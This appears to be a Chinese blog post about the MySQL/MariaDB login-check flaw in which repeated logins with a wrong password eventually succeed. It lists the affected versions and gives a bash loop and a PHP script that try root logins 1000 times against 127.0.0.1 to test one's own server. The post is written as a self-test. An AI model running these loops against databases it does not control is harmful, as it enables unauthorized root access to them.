6月份,mysql爆了个较严重的编译漏洞登录验证问题,受影响版本有
All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 arevulnerable.MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.

更多详情可看 这里 经本人测试,本官网里提供的一键安装包,未发现有此问题,其它同学也可以用如下脚本测试确认下

for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done

直接在终端命令行上执行上面一行,如能看到提示
mysql>
则说明存在此问题,如果没任务提示或显示,则是没有问题

以上传自wdlinux官方论坛,这几天测试刚好遇到类型的事情,就准备测试一下,使用的是php环境,就弄了个php代码,还是参考av大牛的,自己什么也不会呀,郁闷。

<?php
/**
 * 受影响版本有
 * All MariaDB and MySQL versions up to 5.1.61, 5.2.11, 5.3.5, 5.5.22 arevulnerable
 * MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not
 * MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
 */
for($i = 1;$i <= 1000;$i++)
{
    @$link = mysql_connect("127.0.0.1", "root", "xxxxx");
    echo "测试次数:" . $i . "<br>";
    if ($link)
    {
        echo "Connect Successfully!";
        mysql_close($link);
        break;
    }
}

?>

参考网站:http://www.wdlinux.cn/bbs/thread-2403-1-1.html